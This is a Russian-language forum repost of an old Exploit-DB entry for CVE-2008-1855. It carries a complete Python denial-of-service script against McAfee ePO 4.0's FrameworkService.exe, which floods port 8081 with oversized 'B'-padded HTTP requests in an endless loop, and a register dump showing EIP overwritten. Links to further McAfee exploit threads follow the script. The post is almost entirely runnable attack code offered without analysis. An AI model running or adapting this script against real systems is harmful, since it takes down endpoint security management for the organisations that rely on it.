Exploit Mcafee EPO 4.0 - 'FrameworkService.exe' Remote Denial of Service

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5343
Проверка EDB
  1. Пройдено
Автор
MUTS
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2008-1855
Дата публикации
2008-04-02
Код: 
#!/usr/bin/python
# Mcafee EPO 4.0 (and others) FrameworkService.exe DOS
# More than meets the eye
# Discovered and coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/mcafee_again.py.txt


# EAX 00840C30
# ECX 00837830
# EDX 01EACF18
# EBX 00004000
# ESP 01EAFF04
# EBP 01EAFF38
# ESI 00837830
# EDI 643AC780 naCmnLib.CnaLogger::AddMessageA
# EIP 42424242

import socket
import os
import sys
from time import sleep

expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*96000+" HTTP/1.1\r\n"
req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
expl.send (req)
#data=expl.recv(1024)
#print data
expl.close()

expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*96000+" HTTP/1.1\r\n"
req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
expl.send (req)
#data=expl.recv(1024)
#print data
expl.close()

expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*96000+" HTTP/1.1\r\n"
req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
expl.send (req)
#data=expl.recv(1024)
#print data
expl.close()

while 1:

	expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
	expl.connect ( ( sys.argv[1], 8081 ) )
	buff="B"*243
	req= buff +' /spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n'
	expl.send (req)
	expl.send (req)
	expl.send (req)
	expl.send (req)
	expl.send (req)
	expl.send (req)
	expl.send (req)
	expl.send (req)
	expl.send (req)
	expl.send (req)
	expl.send (req)
	expl.send (req)
	data=expl.recv(1024)
	print data
	expl.close()

	sleep(0.1)

# milw0rm.com [2008-04-02]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit McAfee True Key - McAfee.TrueKey.Service Privilege Escalation
Ответы
0
Просмотры
644
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit McAfee Virus Scan Enterprise for Linux 1.9.2 < 2.0.2 - Remote Code Execution
Ответы
0
Просмотры
570
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit McAfee LiveSafe 14.0 - Relocations Processing Memory Corruption
Ответы
0
Просмотры
519
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit [Spanish] Bypass a lista blanca de McAfee Appication Control
Ответы
0
Просмотры
514
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit McAfee Data Loss Prevention - Multiple Information Disclosure Vulnerabilities
Ответы
0
Просмотры
478
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit McAfee Vulnerability Manager - 'cert_cn' Cross-Site Scripting
Ответы
0
Просмотры
492
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit McAfee Web Gateway 7.1.5.x - 'Host' HTTP Header Security Bypass
Ответы
0
Просмотры
468
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit McAfee 4.0 / Network Associates for Windows NT 4.0.2/4.0.3 a / Norton AntiVirus 2000 - Recycle Bin Exclusion
Ответы
0
Просмотры
469
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit McAfee Unified Threat Management Firewall 4.0.6 - 'page' Cross-Site Scripting
Ответы
0
Просмотры
451
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit McAfee Email Gateway 6.7.1 - 'systemWebAdminConfig.do' Remote Security Bypass
Ответы
0
Просмотры
420
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу